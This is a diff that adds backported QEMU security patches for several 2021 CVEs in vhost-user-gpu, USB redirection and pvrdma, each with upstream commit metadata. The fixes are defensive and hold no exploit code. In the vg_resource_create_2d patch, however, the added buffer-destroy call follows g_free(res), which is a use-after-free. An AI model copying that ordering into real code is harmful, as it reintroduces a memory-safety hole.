index 00000000000..981c2372929
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0001-vhost-user-gpu-fix-memory-disclosure-in-virgl_cmd_ge.patch
@@ -0,0 +1,43 @@
+CVE: CVE-2021-3545
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 121841b25d72d13f8cad554363138c360f1250ea Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:03:56 -0700
+Subject: [PATCH 1/7] vhost-user-gpu: fix memory disclosure in
+ virgl_cmd_get_capset_info (CVE-2021-3545)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Otherwise some of the 'resp' will be leaked to guest.
+
+Fixes: CVE-2021-3545
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 42a8dadc74 ("virtio-gpu: fix information leak
+in getting capset info dispatch")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-2-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+---
+ contrib/vhost-user-gpu/virgl.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/contrib/vhost-user-gpu/virgl.c b/contrib/vhost-user-gpu/virgl.c
+index 9e6660c7ab..6a332d601f 100644
+--- a/contrib/vhost-user-gpu/virgl.c
++++ b/contrib/vhost-user-gpu/virgl.c
+@@ -128,6 +128,7 @@ virgl_cmd_get_capset_info(VuGpu *g,
+
+ VUGPU_FILL_CMD(info);
+
++ memset(&resp, 0, sizeof(resp));
+ if (info.capset_index == 0) {
+ resp.capset_id = VIRTIO_GPU_CAPSET_VIRGL;
+ virgl_renderer_get_cap_set(resp.capset_id,
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/0002-vhost-user-gpu-fix-resource-leak-in-vg_resource_crea.patch b/meta/recipes-devtools/qemu/qemu/0002-vhost-user-gpu-fix-resource-leak-in-vg_resource_crea.patch
new file mode 100644
index 00000000000..a9aee47e392
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0002-vhost-user-gpu-fix-resource-leak-in-vg_resource_crea.patch
@@ -0,0 +1,41 @@
+CVE: CVE-2021-3544
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 86dd8fac2acc366930a5dc08d3fb1b1e816f4e1e Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:03:57 -0700
+Subject: [PATCH 2/7] vhost-user-gpu: fix resource leak in
+ 'vg_resource_create_2d' (CVE-2021-3544)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Call 'vugbm_buffer_destroy' in error path to avoid resource leak.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-3-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+---
+ contrib/vhost-user-gpu/vhost-user-gpu.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/contrib/vhost-user-gpu/vhost-user-gpu.c b/contrib/vhost-user-gpu/vhost-user-gpu.c
+index f73f292c9f..b5e153d0d6 100644
+--- a/contrib/vhost-user-gpu/vhost-user-gpu.c
++++ b/contrib/vhost-user-gpu/vhost-user-gpu.c
+@@ -349,6 +349,7 @@ vg_resource_create_2d(VuGpu *g,
+ g_critical("%s: resource creation failed %d %d %d",
+ __func__, c2d.resource_id, c2d.width, c2d.height);
+ g_free(res);
++ vugbm_buffer_destroy(&res->buffer);
+ cmd->error = VIRTIO_GPU_RESP_ERR_OUT_OF_MEMORY;
+ return;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/0003-vhost-user-gpu-fix-memory-leak-in-vg_resource_attach.patch b/meta/recipes-devtools/qemu/qemu/0003-vhost-user-gpu-fix-memory-leak-in-vg_resource_attach.patch
new file mode 100644
index 00000000000..17184864055
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0003-vhost-user-gpu-fix-memory-leak-in-vg_resource_attach.patch
@@ -0,0 +1,48 @@
+CVE: CVE-2021-3544
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From b9f79858a614d95f5de875d0ca31096eaab72c3b Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:03:58 -0700
+Subject: [PATCH 3/7] vhost-user-gpu: fix memory leak in
+ vg_resource_attach_backing (CVE-2021-3544)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Check whether the 'res' has already been attach_backing to avoid
+memory leak.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 204f01b309 ("virtio-gpu: fix memory leak
+in resource attach backing")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-4-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+---
+ contrib/vhost-user-gpu/vhost-user-gpu.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/contrib/vhost-user-gpu/vhost-user-gpu.c b/contrib/vhost-user-gpu/vhost-user-gpu.c
+index b5e153d0d6..0437e52b64 100644
+--- a/contrib/vhost-user-gpu/vhost-user-gpu.c
++++ b/contrib/vhost-user-gpu/vhost-user-gpu.c
+@@ -489,6 +489,11 @@ vg_resource_attach_backing(VuGpu *g,
+ return;
+ }
+
++ if (res->iov) {
++ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
++ return;
++ }
++
+ ret = vg_create_mapping_iov(g, &ab, cmd, &res->iov);
+ if (ret != 0) {
+ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/0004-vhost-user-gpu-fix-memory-leak-while-calling-vg_reso.patch b/meta/recipes-devtools/qemu/qemu/0004-vhost-user-gpu-fix-memory-leak-while-calling-vg_reso.patch
new file mode 100644
index 00000000000..9fc2fafe1dc
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0004-vhost-user-gpu-fix-memory-leak-while-calling-vg_reso.patch
@@ -0,0 +1,50 @@
+CVE: CVE-2021-3544
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From b7afebcf9e6ecf3cf9b5a9b9b731ed04bca6aa3e Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:03:59 -0700
+Subject: [PATCH 4/7] vhost-user-gpu: fix memory leak while calling
+ 'vg_resource_unref' (CVE-2021-3544)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If the guest trigger following sequences, the attach_backing will be leaked:
+
+ vg_resource_create_2d
+ vg_resource_attach_backing
+ vg_resource_unref
+
+This patch fix this by freeing 'res->iov' in vg_resource_destroy.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 5e8e3c4c75 ("virtio-gpu: fix resource leak
+in virgl_cmd_resource_unref")
+
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-5-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+---
+ contrib/vhost-user-gpu/vhost-user-gpu.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/contrib/vhost-user-gpu/vhost-user-gpu.c b/contrib/vhost-user-gpu/vhost-user-gpu.c
+index 0437e52b64..770dfad529 100644
+--- a/contrib/vhost-user-gpu/vhost-user-gpu.c
++++ b/contrib/vhost-user-gpu/vhost-user-gpu.c
+@@ -400,6 +400,7 @@ vg_resource_destroy(VuGpu *g,
+ }
+
+ vugbm_buffer_destroy(&res->buffer);
++ g_free(res->iov);
+ pixman_image_unref(res->image);
+ QTAILQ_REMOVE(&g->reslist, res, next);
+ g_free(res);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/0005-vhost-user-gpu-fix-memory-leak-in-virgl_cmd_resource.patch b/meta/recipes-devtools/qemu/qemu/0005-vhost-user-gpu-fix-memory-leak-in-virgl_cmd_resource.patch
new file mode 100644
index 00000000000..e70f3c02c26
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0005-vhost-user-gpu-fix-memory-leak-in-virgl_cmd_resource.patch
@@ -0,0 +1,58 @@
+CVE: CVE-2021-3544
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From f6091d86ba9ea05f4e111b9b42ee0005c37a6779 Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:00 -0700
+Subject: [PATCH 5/7] vhost-user-gpu: fix memory leak in
+ 'virgl_cmd_resource_unref' (CVE-2021-3544)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The 'res->iov' will be leaked if the guest trigger following sequences:
+
+ virgl_cmd_create_resource_2d
+ virgl_resource_attach_backing
+ virgl_cmd_resource_unref
+
+This patch fixes this.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 5e8e3c4c75 ("virtio-gpu: fix resource leak
+in virgl_cmd_resource_unref"
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-6-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+---
+ contrib/vhost-user-gpu/virgl.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/contrib/vhost-user-gpu/virgl.c b/contrib/vhost-user-gpu/virgl.c
+index 6a332d601f..c669d73a1d 100644
+--- a/contrib/vhost-user-gpu/virgl.c
++++ b/contrib/vhost-user-gpu/virgl.c
+@@ -108,9 +108,16 @@ virgl_cmd_resource_unref(VuGpu *g,
+ struct virtio_gpu_ctrl_command *cmd)
+ {
+ struct virtio_gpu_resource_unref unref;
++ struct iovec *res_iovs = NULL;
++ int num_iovs = 0;
+
+ VUGPU_FILL_CMD(unref);
+
++ virgl_renderer_resource_detach_iov(unref.resource_id,
++ &res_iovs,
++ &num_iovs);
++ g_free(res_iovs);
++
+ virgl_renderer_resource_unref(unref.resource_id);
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/0006-vhost-user-gpu-fix-memory-leak-in-virgl_resource_att.patch b/meta/recipes-devtools/qemu/qemu/0006-vhost-user-gpu-fix-memory-leak-in-virgl_resource_att.patch
new file mode 100644
index 00000000000..5efb87ca33a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0006-vhost-user-gpu-fix-memory-leak-in-virgl_resource_att.patch
@@ -0,0 +1,49 @@
+CVE: CVE-2021-3544
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 63736af5a6571d9def93769431e0d7e38c6677bf Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:01 -0700
+Subject: [PATCH 6/7] vhost-user-gpu: fix memory leak in
+ 'virgl_resource_attach_backing' (CVE-2021-3544)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_renderer_resource_attach_iov' failed, the 'res_iovs' will
+be leaked.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 33243031da ("virtio-gpu-3d: fix memory leak
+in resource attach backing")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-7-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+---
+ contrib/vhost-user-gpu/virgl.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/contrib/vhost-user-gpu/virgl.c b/contrib/vhost-user-gpu/virgl.c
+index c669d73a1d..a16a311d80 100644
+--- a/contrib/vhost-user-gpu/virgl.c
++++ b/contrib/vhost-user-gpu/virgl.c
+@@ -287,8 +287,11 @@ virgl_resource_attach_backing(VuGpu *g,
+ return;
+ }
+
+- virgl_renderer_resource_attach_iov(att_rb.resource_id,
++ ret = virgl_renderer_resource_attach_iov(att_rb.resource_id,
+ res_iovs, att_rb.nr_entries);
++ if (ret != 0) {
++ g_free(res_iovs);
++ }
+ }
+
+ static void
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/0007-vhost-user-gpu-fix-OOB-write-in-virgl_cmd_get_capset.patch b/meta/recipes-devtools/qemu/qemu/0007-vhost-user-gpu-fix-OOB-write-in-virgl_cmd_get_capset.patch
new file mode 100644
index 00000000000..33e6a661938
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0007-vhost-user-gpu-fix-OOB-write-in-virgl_cmd_get_capset.patch
@@ -0,0 +1,49 @@
+CVE: CVE-2021-3546
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 9f22893adcb02580aee5968f32baa2cd109b3ec2 Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:02 -0700
+Subject: [PATCH 7/7] vhost-user-gpu: fix OOB write in 'virgl_cmd_get_capset'
+ (CVE-2021-3546)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_cmd_get_capset' set 'max_size' to 0,
+the 'virgl_renderer_fill_caps' will write the data after the 'resp'.
+This patch avoid this by checking the returned 'max_size'.
+
+virtio-gpu fix: abd7f08b23 ("display: virtio-gpu-3d: check
+virgl capabilities max_size")
+
+Fixes: CVE-2021-3546
+Reported-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-8-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+---
+ contrib/vhost-user-gpu/virgl.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/contrib/vhost-user-gpu/virgl.c b/contrib/vhost-user-gpu/virgl.c
+index a16a311d80..7172104b19 100644
+--- a/contrib/vhost-user-gpu/virgl.c
++++ b/contrib/vhost-user-gpu/virgl.c
+@@ -177,6 +177,10 @@ virgl_cmd_get_capset(VuGpu *g,
+
+ virgl_renderer_get_cap_set(gc.capset_id, &max_ver,
+ &max_size);
++ if (!max_size) {
++ cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER;
++ return;
++ }
+ resp = g_malloc0(sizeof(*resp) + max_size);
+
+ resp->hdr.type = VIRTIO_GPU_RESP_OK_CAPSET;
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
new file mode 100644
index 00000000000..77a5385692c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
@@ -0,0 +1,42 @@
+From 05a40b172e4d691371534828078be47e7fff524c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:15 +0200
+Subject: [PATCH] usb: limit combined packets to 1 MiB (CVE-2021-3527)
+
+usb-host and usb-redirect try to batch bulk transfers by combining many
+small usb packets into a single, large transfer request, to reduce the
+overhead and improve performance.
+
+This patch adds a size limit of 1 MiB for those combined packets to
+restrict the host resources the guest can bind that way.
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Message-Id: <20210503132915.2335822-6-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/05a40b172e4d691371534828078be47e7fff524c
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/combined-packet.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/hw/usb/combined-packet.c b/hw/usb/combined-packet.c
+index 5d57e883dc..e56802f89a 100644
+--- a/hw/usb/combined-packet.c
++++ b/hw/usb/combined-packet.c
+@@ -171,7 +171,9 @@ void usb_ep_combine_input_packets(USBEndpoint *ep)
+ if ((p->iov.size % ep->max_packet_size) != 0 || !p->short_not_ok ||
+ next == NULL ||
+ /* Work around for Linux usbfs bulk splitting + migration */
+- (totalsize == (16 * KiB - 36) && p->int_req)) {
++ (totalsize == (16 * KiB - 36) && p->int_req) ||
++ /* Next package may grow combined package over 1MiB */
++ totalsize > 1 * MiB - ep->max_packet_size) {
+ usb_device_handle_data(ep->dev, first);
+ assert(first->status == USB_RET_ASYNC);
+ if (first->combined) {
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
new file mode 100644
index 00000000000..6371aced12d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
@@ -0,0 +1,59 @@
+From 7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:12 +0200
+Subject: [PATCH] usb/redir: avoid dynamic stack allocation (CVE-2021-3527)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Use autofree heap allocation instead.
+
+Fixes: 4f4321c11ff ("usb: use iovecs in USBPacket")
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Tested-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20210503132915.2335822-3-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/redirect.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
+index 17f06f3417..6a75b0dc4a 100644
+--- a/hw/usb/redirect.c
++++ b/hw/usb/redirect.c
+@@ -620,7 +620,7 @@ static void usbredir_handle_iso_data(USBRedirDevice *dev, USBPacket *p,
+ .endpoint = ep,
+ .length = p->iov.size
+ };
+- uint8_t buf[p->iov.size];
++ g_autofree uint8_t *buf = g_malloc(p->iov.size);
+ /* No id, we look at the ep when receiving a status back */
+ usb_packet_copy(p, buf, p->iov.size);
+ usbredirparser_send_iso_packet(dev->parser, 0, &iso_packet,
+@@ -818,7 +818,7 @@ static void usbredir_handle_bulk_data(USBRedirDevice *dev, USBPacket *p,
+ usbredirparser_send_bulk_packet(dev->parser, p->id,
+ &bulk_packet, NULL, 0);
+ } else {
+- uint8_t buf[size];
++ g_autofree uint8_t *buf = g_malloc(size);
+ usb_packet_copy(p, buf, size);
+ usbredir_log_data(dev, "bulk data out:", buf, size);
+ usbredirparser_send_bulk_packet(dev->parser, p->id,
+@@ -923,7 +923,7 @@ static void usbredir_handle_interrupt_out_data(USBRedirDevice *dev,
+ USBPacket *p, uint8_t ep)
+ {
+ struct usb_redir_interrupt_packet_header interrupt_packet;
+- uint8_t buf[p->iov.size];
++ g_autofree uint8_t *buf = g_malloc(p->iov.size);
+
+ DPRINTF("interrupt-out ep %02X len %zd id %"PRIu64"\n", ep,
+ p->iov.size, p->id);
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
new file mode 100644
index 00000000000..7a88e293841
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
@@ -0,0 +1,47 @@
+From 284f191b4abad213aed04cb0458e1600fd18d7c4 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel@redhat.com>
+Date: Wed, 16 Jun 2021 14:06:00 +0300
+Subject: [PATCH] hw/rdma: Fix possible mremap overflow in the pvrdma device
+ (CVE-2021-3582)
+
+Ensure mremap boundaries not trusting the guest kernel to
+pass the correct buffer length.
+
+Fixes: CVE-2021-3582
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210616110600.20889-1-marcel.apfelbaum@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3582
+Upstream-Status: Backport [284f191b4abad213aed04cb0458e1600fd18d7c4]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_cmd.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_cmd.c b/hw/rdma/vmw/pvrdma_cmd.c
+index f59879e257..da7ddfa548 100644
+--- a/hw/rdma/vmw/pvrdma_cmd.c
++++ b/hw/rdma/vmw/pvrdma_cmd.c
+@@ -38,6 +38,13 @@ static void *pvrdma_map_to_pdir(PCIDevice *pdev, uint64_t pdir_dma,
+ return NULL;
+ }
+
++ length = ROUND_UP(length, TARGET_PAGE_SIZE);
++ if (nchunks * TARGET_PAGE_SIZE != length) {
++ rdma_error_report("Invalid nchunks/length (%u, %lu)", nchunks,
++ (unsigned long)length);
++ return NULL;
++ }
++
+ dir = rdma_pci_dma_map(pdev, pdir_dma, TARGET_PAGE_SIZE);
+ if (!dir) {
+ rdma_error_report("Failed to map to page directory");
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
new file mode 100644
index 00000000000..0547c744841
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
@@ -0,0 +1,43 @@
+From 32e5703cfea07c91e6e84bcb0313f633bb146534 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:46:34 +0300
+Subject: [PATCH] pvrdma: Ensure correct input on ring init (CVE-2021-3607)
+
+Check the guest passed a non zero page count
+for pvrdma device ring buffers.
+
+Fixes: CVE-2021-3607
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630114634.2168872-1-marcel@redhat.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3607
+Upstream-Status: Backport [32e5703cfea07c91e6e84bcb0313f633bb146534]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_main.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_main.c b/hw/rdma/vmw/pvrdma_main.c
+index 84ae8024fc..7c0c3551a8 100644
+--- a/hw/rdma/vmw/pvrdma_main.c
++++ b/hw/rdma/vmw/pvrdma_main.c
+@@ -92,6 +92,11 @@ static int init_dev_ring(PvrdmaRing *ring, PvrdmaRingState **ring_state,
+ uint64_t *dir, *tbl;
+ int rc = 0;
+
++ if (!num_pages) {
++ rdma_error_report("Ring pages count must be strictly positive");
++ return -EINVAL;
++ }
++
+ dir = rdma_pci_dma_map(pci_dev, dir_addr, TARGET_PAGE_SIZE);
+ if (!dir) {
+ rdma_error_report("Failed to map to page directory (ring %s)", name);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
new file mode 100644
index 00000000000..22d68b025d8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
@@ -0,0 +1,43 @@
+From 66ae37d8cc313f89272e711174a846a229bcdbd3 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:52:46 +0300
+Subject: [PATCH] pvrdma: Fix the ring init error flow (CVE-2021-3608)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Do not unmap uninitialized dma addresses.
+
+Fixes: CVE-2021-3608
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630115246.2178219-1-marcel@redhat.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3608
+Upstream-Status: Backport [66ae37d8cc313f89272e711174a846a229bcdbd3]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_dev_ring.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/rdma/vmw/pvrdma_dev_ring.c b/hw/rdma/vmw/pvrdma_dev_ring.c
+index 074ac59b84..42130667a7 100644
+--- a/hw/rdma/vmw/pvrdma_dev_ring.c
++++ b/hw/rdma/vmw/pvrdma_dev_ring.c
+@@ -41,7 +41,7 @@ int pvrdma_ring_init(PvrdmaRing *ring, const char *name, PCIDevice *dev,
+ qatomic_set(&ring->ring_state->cons_head, 0);
+ */
+ ring->npages = npages;
+- ring->pages = g_malloc(npages * sizeof(void *));
++ ring->pages = g_malloc0(npages * sizeof(void *));
+
+ for (i = 0; i < npages; i++) {
+ if (!tbl[i]) {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
new file mode 100644
index 00000000000..50a49233d32
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
@@ -0,0 +1,41 @@
+From 5e796671e6b8d5de4b0b423dce1b3eba144a92c9 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 22 Jul 2021 09:27:56 +0200
+Subject: [PATCH] usbredir: fix free call
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+data might point into the middle of a larger buffer, there is a separate
+free_on_destroy pointer passed into bufp_alloc() to handle that. It is
+only used in the normal workflow though, not when dropping packets due
+to the queue being full. Fix that.
+
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/491
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210722072756.647673-1-kraxel@redhat.com>
+
+CVE: CVE-2021-3682
+Upstream-Status: Backport [5e796671e6b8d5de4b0b423dce1b3eba144a92c9]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/usb/redirect.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
+index 4ec9326e05..1ec909a63a 100644
+--- a/hw/usb/redirect.c
++++ b/hw/usb/redirect.c
+@@ -476,7 +476,7 @@ static int bufp_alloc(USBRedirDevice *dev, uint8_t *data, uint16_t len,
+ if (dev->endpoint[EP2I(ep)].bufpq_dropping_packets) {
+ if (dev->endpoint[EP2I(ep)].bufpq_size >
+ dev->endpoint[EP2I(ep)].bufpq_target_size) {
+- free(data);
++ free(free_on_destroy);
+ return -1;
+ }
+ dev->endpoint[EP2I(ep)].bufpq_dropping_packets = 0;
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/rpm/files/0001-CVE-2021-3521.patch b/meta/recipes-devtools/rpm/files/0001-CVE-2021-3521.patch
new file mode 100644
